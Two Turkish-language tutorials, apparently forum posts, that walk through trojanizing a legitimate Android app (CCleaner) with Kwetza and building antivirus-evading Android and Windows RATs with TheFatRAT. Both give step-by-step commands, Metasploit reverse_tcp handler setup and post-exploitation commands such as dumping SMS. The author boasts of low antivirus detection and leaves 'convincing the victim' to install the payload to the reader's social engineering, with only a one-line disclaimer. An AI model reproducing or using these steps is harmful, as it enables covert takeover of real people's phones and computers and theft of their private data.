Kali Linux Android Hack 2

Selamun Aleyküm ..


Kwetza, Android Uygulamalarinin Varsayilan İzinlerini Kullanarak İşlevsellik Kazanmak İçin Gerekli İzinleri Oluşturup Bu İzinleri Mevcut Android Uygulamasina (APK) Enjekte Etememize Yarar.
 Yani Kısaca Mevcut Bi Android Uygulamasına Meterpreter Payloadı Enjekte Etmenizi Sağlar.
git clone https://github.com/sensepost/kwetza.git
Yazarak İndrin
Kwetza Piton İle Yazılmıştır Ve PİP Kullanarak Kurulabilen BeautifulSoup Gerektirir.
pip install beautifulsoup4
Kullandığınız İşletim Sisteminde Apktool'un Kurulu Olması Gerekiyor Eğer Değilse Buradan Bakıp İndirip Yükleyin Yada apt-get install apktool
Şimdi Hedef Bi Tane Android Uygulaması Bulun Yani Karşı Tarafa Göndereceğimiz Apk Ben Cclenear Uygulamasının Apk'sini İndirdim Bu Apk Bir Oyun Olabilir Yada Başka Birşey. Ccleaner-pro.apk 'sini Kwetza Klasörünün İçine Attım Ardından chmod +x kwetza.py Yazarak Gereken İzinleri Verdik.


Yeni Bi Terminal (Komut Satiri) Açip ifconfig Yazarak Yerel İp Adresimizi Öğreniyoruz.
192.168.38.128
python kwetza.py ccleaner.apk 192.168.1.9 4444 yes
Yazarak Zararli Android Uygulamamizi Oluşturuyoruz.
ccleaner.apk Paylod Enjekte Edeceğimiz Apk
192.168.1.9 Bağlantı Sağlayacığımız İp Adresi
4444 Bağlantı Sağlayacağımız Port Numarası 
Oluşturmaya Başladıktan Sonra Bizden  Şifre Girmemizi İstiyor Default Olarak password Yazıp Onaylıyoruz Ve Zararli Uygulamamizi Oluşturdu
Zararlı Uygulamamizi Kwetza Klasörünün İçine Uygulamamız Adında Dosya Oluşturup Dist Dosyasının İçine ccleaner.apk Olarak Kayıt Etti.
Virüs Total Sonucu Burada
59 Antivürüsden 6 Tanesi Yakaladi Neyse Bu Olusturdugumuz Apk yi Bir Şekilde Hedefe Gönderip Telefona Kurmasını Sağlıyoruz Ardından Metasploit'i Açıp Gerekli Exploiti Ve Payloadı Belirtip Ayarları Yaptıktan Sonra Exploit Ediyoruz

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 4444
exploit 
Yazarak Exploit Ediyoruz Ve Oturum Açılıyor
Normalde Bu Apk yi Test Edicektim Ancak Diğer Pc de Sıkıntı Yaşadım O Yüzden Test Etme Şansım Olmadı Umarım Anlasılır OLmustur...

TrazeR Sunar /

Kali Linux Tools TheFatRAT


Selamun Aleyküm ..

TheFatRAT Nedir?

Msfvenom (Metasploit Çerçevesinin Bir Parçası) İle Arka Kapı Açmak İçin Kolay Bir Araçtır. Bu Araç, Popüler Yüklü Bir Malware (Virus) Derler Ve Sonra Derlenmiş Zararlı Yazılımları Windows, Android, Mac Üzerinde Çalıştırır. Bu Araçla Oluşturulan Zararlı Yazılımların Çoğu A.V (Anti Virüs) Yazılımlarının Korumasını Atlamak Gibi Bir Yeteneği Var.
Kısaca Tanımını Yaptıktan Sonra Aracımızı İndirip Kurulum İşlemlerini Yapalım.
Linuxda Terminali Açıp ;
cd Desktop 
git clone https://github.com/Screetsec/TheFatRat.git
Yazarak TheFatRaT 'i Desktopa Yani Masaüstüne İndirelim.

Ardından 
cd TheFatRat Yazarak İndirdiğimiz Klasörün İçine Girip
ls Komutuyla Listeleyelim Gördüüğünüz Gibi Setup Dosyası Var
cd setup Yazarak Dosyamızın İçine Girelim
chmod +x setup.sh && ./setup.sh
Yazarak Yetkilendirmemizi Yapıp Aracımızın Kurulumunu Gerçekleştirelim.

Gerekli Araçların Kurulumu İçin Bekliyoruz.

Kurulum İşlemimiz Bittikten Sonra ;
cd ..
Yazarak TheFatRAT Klasörüne Geliyorum
ls komutuyla Listeliyorum.
 powerfull.sh ve fatrat Dosyalarina Gerekli İzinleri Veriyorum.
chmod +x powerfull.sh
chmod +x fatrat

./fatrat yazarak Çalıştırıyoruz

Herhangi Bi Tuşa Basarak Devam Ediyoruz.

Enterlıyoruz.

Evet Kurulum İşlemimiz Bitti Artık Rat Oluşturabiliriz.
1. Yazıp Enterlıyoruz

Sanal Windows Kurulu Olmadığı İçin Ben Şuanda Sizlere Andorid Emulatör Üzerinde Göstereceğim Onun İçin 3. Seçenekteki Android Fatrat.APK yi Seçiyorum.


3. Yazdıktan Sonra Bize LHOST Ve LPORT 'Larımızı Soruyor Local Host Adresimizi Öğrenmek İçin Yeni Terminal Açıp ipconfig Komutunu Yazıyoruz
LHOST  Adresimizi Yazıyoruz LPORT 'umuzu Belirtiyoruz (4444)
Ardından Oluşacak APK Dosyamızın Adını Belirtiyoruz Gelen Pencereden
3. Seçeneği Yani android/meterpreter/reverse_tcp 'yi Seçip Ok Diyoruz

androidhack.apk Adında Oluşturdu APK Dosyamızı.(İp Adresleri Farkli Aldırmayın Diğer Pc De Metasploitte Hata Aldım O Yüzden Başka Pcden Yapıyorum)


Oluşan androidhack.apk TheFatRat Dosyamızın İçindeki Output Dosyasına Kayıt Ediyor Otamatik Olarak Oradan Alıp Android Emulatörümüze Yükleyelim Çalıştıralim.


Tabi Bunu Siz Kurbana Nasıl Yüklettirip Nasıl Çalıştırmasına İkna Ediceksiniz Orası Size Kalmıs :)
Yeni Tarminal Açıp msfconsole Yazarak Metasploit Framework Konsolumuzu Açıyoruz.


Açıktan Sonra;
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Yazarak Exploitimizi Ve Payloadımızı Belirtiyoruz.

Ardından Apk Oluşturken Girdiğimiz LHOST Ve LPORT 'umuzu Yazıyoruz.
set lhost 192.168.72.133
set lport 4444
Ve exploit Yazarak Çalıştırıyoruz

Session 1 Opened = Yani 1 Oturum Açıldı Diyor

sysinfo Komutla Bilgilere Bakalım Gerçekten Oturum Açılmışmı.
Gördüğünüz Gibi Bilgileri Gösteriyor.

Şimdi help Yazarak Neler Yapabileceğimize Bakalım
help;


check_root Yazarak Root Edelim.

ifconfig Yazıp İp,Mac Bilgilerine Bakalim

Help Yazınca Zaten Neler Yapabileceğinizi Gösteriyor Atıyorum Sms Bilgilerini Almak İçin dump_sms Yazmalisiniz. Şimdi Gelelim Windows İçin Rat Oluşturmaya
İster 1 Numaradan Androidhack.apk Oluşturduğumuz Gibi Oluşturabilir Yada 2. Ve 6. Numaradan Aynı Sekılde Oluşturabilirsiniz.

  Burada Dikkat Etmeniz Gereken Husus 2. ve 6. Seçenektekii % Değerleri.
Bakınız 2. Seçenekte %100 6. Seçenekte %1000 Biz Buradan 2.Seçeneği Kullanarak Rat Oluşturacağız.
Şimdi 2 Yazıp Enterlıyoruz.
Ve Böyle Bı Ekran Karşılıyor Bizi

Yine Aynı Şekilde Bize LHOST 'umuzu Ve LPORT 'umuzu Soruyor
Yeni Terminal Açıp İfconfig Yazarak  Lhost Adresimizi Öğreniyoruz.

Gerekli Bilgileri Yazıp Enterlıyoruz.

/root/Desktop/TheFatRat/output/powerfull.exe Olarak Kayıt Ettiğini Görüyoruz.

Bakalım Gerçektende Ordamı (:

Şimdi 2 Tane Sorunumuz Var
1. Bunu Kurbanin Bilgisayarina Nasıl İndirticez ?
2. Hadi İndirttik Nasıl Çalıştırmasına İkna Edicez ?
Eee Onuda Sizlerin Sosyal Mühendisliğine Bırakıyorum (:

Bu 2 Sorunu Çözdüğünüzü Varsayarak
Yeni Terminal Açıp
msfconsole Yazarak
Metasploit Framework Konsolumuzu Açıyoruz.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Komutlarini Yazarak Exploitimizi Payloadımızı Belirliyoruz.
show options
Show Options Komutu İle Ayarlara Bakıyoruz
Ratı Oluştururken Girdiğimiz Lhost Ve Lport Adresimizi Giriyoruz.

set LHOST 192.168.72.133
set LPORT 8080

exploit
Komutuyla Çalıştıyoruz Çalıştıktan Sonra Yine Help Yazarak Gerekli Komut Bilgilerini Alabilirsiniz
Sanal Windows Kurulu Olmadığı İçin Gösteremiyorum.

NOT: KONU BİLGİLENDİRME AMAÇLIDIR OLUŞABİLECEK SORUNLARDAN ŞAHSINIZ SORUMLUDUR. 

TrazeR Sundu //